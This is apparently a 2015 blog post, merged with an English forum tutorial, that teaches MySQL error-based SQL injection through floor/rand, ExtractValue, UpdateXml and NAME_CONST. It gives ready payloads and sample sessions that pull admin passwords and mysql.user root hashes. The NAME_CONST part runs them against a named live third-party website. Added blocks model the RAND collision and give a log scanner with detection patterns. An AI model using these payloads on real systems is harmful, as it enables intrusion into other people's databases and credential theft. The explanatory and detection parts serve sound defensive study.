
MySQL: exploiting the three error-based injection modes floor, ExtractValue and UpdateXml

Posted on 2015-11-11 19:03:37

1. Triggering an error with floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

An example follows. First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace version() with the desired subquery.
For example, to fetch the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
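Why the GROUP BY key collides, as an added illustration that is not part of the original post: a Python model of MySQL's seeded RAND() generator and of the temporary-table step of GROUP BY. The generator constants are assumed to match the server's randominit()/my_rnd(); the version prefix is just a sample value.

```python
# Added illustration, not code from the original post. Models why
# `concat(version(), floor(rand(0)*2))` under GROUP BY raises ERROR 1062.
# Assumption: MySQL's randominit()/my_rnd() use seed1 = seed*0x10001 + 55555555,
# seed2 = seed*0x10000001 and the modulus 0x3FFFFFFF.

MAX_VALUE = 0x3FFFFFFF


class MySQLRand:
    """Deterministic RAND(seed): same seed gives the same sequence on every scan."""

    def __init__(self, seed):
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def rand(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_sequence(seed, n):
    """floor(rand(seed)*2) for the first n evaluations (seed 0 gives 0,1,1,0,1,1,...)."""
    r = MySQLRand(seed)
    return [int(r.rand() * 2) for _ in range(n)]


def group_by_with_rand(n_rows, seed=0, prefix="5.1.33-community-log"):
    """Model of GROUP BY over a key that contains RAND().

    For each scanned row the key is evaluated once to look it up in the group
    temp table; if it is absent, the key is evaluated AGAIN for the insert.
    The second value can differ, so the inserted key may already exist:
    that is "Duplicate entry ... for key 'group_key'".
    Returns ("ok", groups) or ("ERROR 1062", duplicate_key).
    """
    r = MySQLRand(seed)
    groups = {}
    for _ in range(n_rows):
        lookup_key = f"{prefix}{int(r.rand() * 2)}"
        if lookup_key in groups:          # existing group: just count the row
            groups[lookup_key] += 1
            continue
        insert_key = f"{prefix}{int(r.rand() * 2)}"  # re-evaluated on insert
        if insert_key in groups:          # collision: MySQL aborts the query
            return ("ERROR 1062", insert_key)
        groups[insert_key] = 1
    return ("ok", groups)
```

With seed 0 the collision happens on the third scanned row, which is why the source table (here information_schema.tables, or the three-row union) must supply at least three rows.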

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Further collected material:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection trick for newer MySQL versions: injection using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables
Let's try it out on my site..
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'


Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
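From the defender's side, an added example that is not part of the original post: a small Python scanner that flags request paths carrying the four error-based techniques collected above (floor/rand, extractvalue, updatexml, name_const) and recognises the MySQL error strings that should never reach a client. The log lines and paths are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Added defensive example, not part of the original post: flag requests that
# carry the four error-based techniques above (floor/rand, extractvalue,
# updatexml, name_const) and MySQL error text that leaked into a response or
# application log. All log lines below are constructed samples.
REQUEST_SIGNATURES = {
    "floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    "updatexml": re.compile(r"updatexml\s*\(", re.I),
    "name_const": re.compile(r"name_const\s*\(", re.I),
}
# These messages mean a database error reached the client (error display left on).
LEAK_SIGNATURES = re.compile(
    r"Duplicate entry '.*' for key 'group_key'|XPATH syntax error|Duplicate column name", re.I)
ACCESS_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d" (\d{3})')


def classify_request(raw_path):
    # Decode '+' and %xx first: the payloads in the post are sent URL-encoded.
    decoded = unquote_plus(raw_path)
    return sorted(n for n, rx in REQUEST_SIGNATURES.items() if rx.search(decoded))


def scan_access_log(lines):
    # Returns (script path, HTTP status, [techniques]) per suspicious request.
    hits = []
    for line in lines:
        m = ACCESS_LINE.search(line)
        if m and (techniques := classify_request(m.group(1))):
            hits.append((m.group(1).split("?")[0], m.group(2), techniques))
    return hits


def leaks_db_error(text):
    # True when a response body or app log contains one of the tell-tale errors.
    return LEAK_SIGNATURES.search(text) is not None


SAMPLE_LOG = [  # constructed Apache-style lines
    '10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /detail.php?id=330 HTTP/1.1" 200 5123',
    '10.0.0.5 - - [11/Nov/2015:19:04:02 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 731',
    '10.0.0.5 - - [11/Nov/2015:19:04:40 +0800] "GET /detail.php?id=1%20and%20extractvalue(1,concat(0x5c,version())) HTTP/1.1" 500 702',
    '10.0.0.5 - - [11/Nov/2015:19:05:11 +0800] "GET /detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 745',
]
```

A signature hit answered with a 5xx, together with a leaked error string, is the strongest signal; the fix is parameterised queries plus never returning raw database errors to clients.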
